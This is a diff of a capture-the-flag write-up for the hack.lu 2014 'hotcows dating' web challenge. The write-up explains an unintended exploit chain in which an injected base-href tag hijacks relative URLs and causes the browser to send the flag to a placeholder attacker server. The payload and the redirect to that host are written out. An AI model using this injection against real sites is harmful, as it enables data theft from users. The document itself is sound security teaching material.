ctfs/write-ups-2014/hack-lu-ctf-2014/hotcows-dating/README.md

 The challenge author confirmed on IRC that this is not the intended solution, although it is a very nice bypass.
 This exploit works because it uses a chain of lucky events:

-1. When instantiating a new `Template` object, the template is immediately loaded via `XMLHttpRequest` and cached in the `sessionStorage`.
+1. When [instantiating a new `Template` object](https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/hotcows-dating/source/js/template.js#L1-L7), the template is [immediately loaded via `XMLHttpRequest` and cached in the `sessionStorage`](https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/hotcows-dating/source/js/loader.js#L32-L42).
-2. Since the injection (lines 144 and 145 in `js/pages/chat.js`) already occurs before the load of the `message.html` template (line 165), the new base URL is in effect.
+2. Since the injection ([lines 144 and 145 in `js/pages/chat.js`](https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/hotcows-dating/source/js/pages/chat.js#L144)) already occurs before the load of the `message.html` template ([line 165](https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/hotcows-dating/source/js/pages/chat.js#L144)), the new base URL is in effect.
-3. The page uses a relative URL to load the `message.html` template, so it is hijacked by the base URL and blocked by CSP.
+3. The page [uses a relative URL to load the `message.html` template](https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/hotcows-dating/source/js/pages/chat.js#L165), so it is hijacked by the base URL and blocked by CSP.
 The `XMLHttpRequest` fails with a `SecurityError`.
 Thus the `temp` variable is not set and remains to be the `location` object.
-4. In `page.appendMessage` the `renderToString` function cannot be found on the `location` object and errors.
+4. In [`page.appendMessage`](https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/hotcows-dating/source/js/pages/chat.js#L104-L111) the `renderToString` function cannot be found on the `location` object and errors.
-5. So this leaves a call to `location.assign('<base href=https://our-server.example.com/> (PREM_flag{cows_need_love_too!})')`.
-This is in fact a relative URL and hence hijacked by the new base URI.
+5. So this leaves a call to [`location.assign('<base href=https://our-server.example.com/> (PREM_flag{cows_need_love_too!})')`](https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/hotcows-dating/source/js/pages/chat.js#L179).
+This is in fact a relative URL and hence hijacked by the new base URL.
 6. Finally the browser redirects to `https://our-server.example.com/<base href=https://our-server.example.com/> (PREM_flag{cows_need_love_too!})`.

 In a way, this exploit is even harder to find than the intended solution.
 Every attacker surfing on `chat.js` fills the `sessionStorage` with the legitimate `message.html` `Template`.
 This stops the exploit from working because it needs the first `SecurityError` due to the `XMLHttpRequest`.